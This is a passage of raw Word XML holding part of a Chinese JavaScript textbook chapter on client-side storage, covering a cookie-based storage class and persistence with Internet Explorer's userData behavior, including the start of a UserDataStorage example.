        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将该名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对数据存储到</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>对象中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cookie[key]=value;//</w:t>
      </w:r>
      <w:r>
        <w:t>开始正式设置</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>首先将要存储的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值进行编码，同时创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>名字</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>编码后的值</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>形式的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cookie=key+"="+encodeURIComponent(value);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的属性也加入到该字符串中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(maxage)cookie+=";max-age="+maxage;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(path)cookie+=";path="+path;//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性来设置</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.coo</w:t>
      </w:r>
      <w:r>
        <w:t>kie=cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>删除指定的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.removeItem=function(key){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!(key in cookie))return;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>不存在，则什么也不做</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>从内部维护的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>组删除指定的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete cookie[key];//</w:t>
      </w:r>
      <w:r>
        <w:t>同时将</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>中的名字也在内部的数组中删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>定义的数组</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会更加简单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>keys.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历所有的名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(keys[i]===key){//</w:t>
      </w:r>
      <w:r>
        <w:t>当我们找到了要找的那个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>keys.splice(i,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>将它从数组中删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.length--;//cookie</w:t>
      </w:r>
      <w:r>
        <w:t>个数减一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>最终通过将该</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值设置为空字符串以及将有效期设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>来删除指定的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.cookie=key+"=;max-age=0";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>删除所有的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.clear=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环所有的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的名字，并将</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var </w:t>
      </w:r>
      <w:r>
        <w:t>i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>keys.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.cookie=keys[i]+"=;max-age=0";//</w:t>
      </w:r>
      <w:r>
        <w:t>重置所有的内部状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cookie={};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>keys=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.length=0;</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16" w:name="20_3_Li_Yong_IE_userDataChi_Jiu_Hua_Shu_"/>
      <w:r>
        <w:t>20.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　利用</w:t>
      </w:r>
      <w:r>
        <w:t>IE userData</w:t>
      </w:r>
      <w:r>
        <w:t>持久化数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="516"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>以上版本的浏览器是通过在</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>元素后面附加一个专属的</w:t>
      </w:r>
      <w:r>
        <w:t>“DHTML</w:t>
      </w:r>
      <w:r>
        <w:t>行为</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来实现客户端存储的。如以下代码所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var memory=document.createElement("div");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.id="_memory";//</w:t>
      </w:r>
      <w:r>
        <w:t>设定一个</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.style.display="none";//</w:t>
      </w:r>
      <w:r>
        <w:t>将其隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>memory.style.behavior="url('#default#userData')";//</w:t>
      </w:r>
      <w:r>
        <w:t>附加</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>行为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.appendChild(memory);//</w:t>
      </w:r>
      <w:r>
        <w:t>将其添加到</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>元素中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一旦给元素赋予了</w:t>
      </w:r>
      <w:r>
        <w:t>"userData"</w:t>
      </w:r>
      <w:r>
        <w:t>行为，该元素就拥有</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用于载入存储的数据。使用它的时候必须传递一个</w:t>
      </w:r>
      <w:r>
        <w:t>字符串作为参数</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>类似于一个文件名，该参数用来指定要载入的存储数据。当数据载入后，就可以通过该元素的属性来访问这些名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对形式的数据，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>getAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>来查询这些数据。通过</w:t>
      </w:r>
      <w:r>
        <w:t>setAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>方法设置属性，然后调用</w:t>
      </w:r>
      <w:r>
        <w:t>sava()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以存储新的数据；而要删除数据，通过使用</w:t>
      </w:r>
      <w:r>
        <w:t>removeAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>方法然后调用</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>方法即可。如下例所示（该例使用了此前例子中初始化的那个</w:t>
      </w:r>
      <w:r>
        <w:t>memory</w:t>
      </w:r>
      <w:r>
        <w:t>元素）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.load("myStoredData");//</w:t>
      </w:r>
      <w:r>
        <w:t>根据指定名，载入对应</w:t>
      </w:r>
      <w:r>
        <w:t>的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=memory.getAttribute("username");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取其中的数据片段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!name){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有指定的数据片段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name=prompt("What is your name?);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取用户输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.setAtttribute("username",name);//</w:t>
      </w:r>
      <w:r>
        <w:t>将其设置成</w:t>
      </w:r>
      <w:r>
        <w:t>memory</w:t>
      </w:r>
      <w:r>
        <w:t>元素的一个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.save("myStoredData");//</w:t>
      </w:r>
      <w:r>
        <w:t>保存它方便下次使用</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默认情况下，通过</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>存储的数据，除非手动去删除它否</w:t>
      </w:r>
      <w:r>
        <w:t>则永不失效。但是，也可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>expires</w:t>
      </w:r>
      <w:r>
        <w:t>属性来指定它的过期</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>时间。就拿上面的例子来说，可以给存储的数据设置时长</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:t>达天的有效期，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var now=(new Date()).getTime();//</w:t>
      </w:r>
      <w:r>
        <w:t>获取当前时间，以毫秒为单位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var expires=now+100*24*60*60*1000;//</w:t>
      </w:r>
      <w:r>
        <w:t>距离当前时间</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:t>天，把天数换算成毫秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>expires=new Date(expires).toUTCString();//</w:t>
      </w:r>
      <w:r>
        <w:t>将其转换成字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.expires=expires;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>的过期时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE userData</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域限制在和当前文档同目录的文档中。它的作用域没有</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>宽泛，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>对其所在目录下的子目录也有效。</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>的机制并没有像</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>那样，通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>属性来控制或者改变其作用域的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>允许存储的数据量要比</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>大，但是却比</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>允许存储的数据量要小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-3</w:t>
      </w:r>
      <w:r>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>实</w:t>
      </w:r>
      <w:r>
        <w:t>现了存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>提供的</w:t>
      </w:r>
      <w:r>
        <w:t>getItem()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>setItem()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>removeItem()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。（但是它没有实现</w:t>
      </w:r>
      <w:r>
        <w:t>key()</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>clear()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，原因是</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>并没有定义遍历所有存储项的一种方法。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-3</w:t>
      </w:r>
      <w:r>
        <w:t>：基于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>实现部分存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function UserDataStorage(maxage){//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>元素并附加</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>行为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此该元素获得</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var memory=document.createElement("d</w:t>
      </w:r>
      <w:r>
        <w:t>iv");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.style.display="none";//</w:t>
      </w:r>
      <w:r>
        <w:t>将其隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.style.behavior="url('#default#userData')";//</w:t>
      </w:r>
      <w:r>
        <w:t>附加</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>行为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.appendChild(memory);//</w:t>
      </w:r>
      <w:r>
        <w:t>将该元素添加到</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>元素中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果传递了</w:t>
      </w:r>
      <w:r>
        <w:t>maxage</w:t>
      </w:r>
      <w:r>
        <w:t>参数（单位为秒），则将其设置为</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期，以毫秒为单位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(maxage){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var now=new </w:t>
      </w:r>
      <w:r>
        <w:t>Date().getTime();//</w:t>
      </w:r>
      <w:r>
        <w:t>当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var expires=now+maxage*1000;//</w:t>
      </w:r>
      <w:r>
        <w:t>当前时间加上有效期就等于过期时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.expires=new Date(expires).toUTCString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通过载入存储的数据来初始化</w:t>
      </w:r>
      <w:r>
        <w:t>memory</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>参数是任意的，只要是在保存的时候存在的就可以了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
